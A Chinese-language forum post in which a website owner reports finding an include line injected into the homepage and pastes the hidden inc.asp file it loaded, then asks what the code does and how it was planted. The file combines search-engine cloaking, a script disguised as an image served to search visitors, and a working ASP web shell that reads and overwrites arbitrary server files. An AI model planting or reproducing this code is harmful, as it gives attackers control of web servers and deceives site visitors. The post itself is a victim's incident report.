看看你的網頁有沒有把這行寫對:
<meta http-equiv="content-type" content="text/html; charset=big5">
或者
<meta http-equiv="content-type" content="text/html; charset=utf-8">
如果有,那再檢查看看內容文字,試著用 ConvertZ 軟體轉換、跟原來的網頁比對看看是不是有夾雜簡體字或別國文字。
我後來進去trace 這個網站 發現是
網站裡面的首頁被崁入了一段程式碼↓
<pre class="c" name="code"><!--#include file="images/inc.asp"-->
然後我再去看這個路徑的下的inc.asp
結果發現這個
<pre class="c" name="code"><%
function isspider()
dim agent,searray,i
agent="agent:"&LCase(request.servervariables("http_user_agent"))
searray=array("googlebot","baiduspider","sogou","yahoo","soso")
isspider= false
for i=0 to ubound(searray)
if (instr(agent,searray(i))>0) then isspider=true
next
end function
function fromse()
dim urlrefer,i,searray
urlrefer="refer:"&LCase(request.ServerVariables("HTTP_REFERER"))
fromse= false
if urlrefer="" then fromse= false
searray=array("google","baidu","sogou","yahoo","soso")
for i=0 to ubound(searray)
if (instr(urlrefer,searray(i))>0) then fromse=true
next
end function
<限1000字 所以改段PO>
<pre class="c" name="code">if(isspider()) then
dim myfso,fileurl,filecon,myfile
fileurl=Server.MapPath("/images/h20.jpg")
Set myfso=Server.CreateObject("Scripting.FileSystemObject")
if myfso.FileExists(fileurl) then
Set myfile=myfso.OpenTextFile(fileurl, 1)
filecon=myfile.readAll
response.write(filecon)
response.write("<!--"&now()&"-->")
myfile.Close
Set myfile=Nothing
Set myfso=Nothing
response.end
end if
end if
<pre class="c" name="code">if (fromse()) then
response.write("<script language='javascript' src='images/m.jpg'></script><br/>")
response.end
end if
%>
<%
on error resume next
id=request("id")
if request("id")="1," then
%>
<pre class="c" name="code"><meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<body bgcolor="#FFFFFF">
<%
Function GetPP
dim s
s=Request.ServerVariables("path_translated")
GetPP=left(s,instrrev(s,"\",len(s)))
End function
MODE=Request("MODE")
sPP=Request("PP")
if sPP="" then sPP=GetPP
if right(sPP,1)<>"\" then sPP=sPP&"\"
Response.Write "<b>Index of "&sPP& "</b>"
%>
<pre class="c" name="code"><%f=request("f")
if f<>"" then
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if request("save")="" then
Set objCountFile = objFSO.OpenTextFile(f,1,True)
If Not objCountFile.AtEndOfStream Then fdata = objCountFile.ReadAll
else
fdata=request("fdata")
Set objCountFile=objFSO.CreateTextFile(f,True)
objCountFile.Write fdata
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
end if
%>
<pre class="c" name="code"><form method=POST>
<table border=0 cellspacing=0 bgcolor=#000000>
<tr>
<td><table border=0 cellpadding=10 cellspacing=0 bgcolor=#FFFFFF>
<tr>
<td><table bordercolor=#0080FF bgcolor=#FFFFD0 border=1>
<tr>
<td bgcolor="#0080FF"><font color="#FFFFFF">Pathㄩ<%=f%></font></td>
<tr>
<td><input type="submit" value="ok" name="save"><input type="reset" value="reset"><br>
<textarea rows="12" name="fdata" cols="99"><%=fdata%></textarea></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</form>
<%end if%>
以上就是 INC.ASP裡面藏的東西
我後來把首頁的<!--#include file="images/inc.asp"--> 這個拿掉
然後再把images/inc.asp這支ASP移出 再去GOOGLE 移除我自己的無效敘述就好了!
但是
有沒有人可以告訴我! 這個程式的意圖要做什麼呢?
另外 他是利用什麼IIS的什麼漏洞把這個inc.asp駭進來及再首頁寫入<!--#include file="images/inc.asp"-->的呢?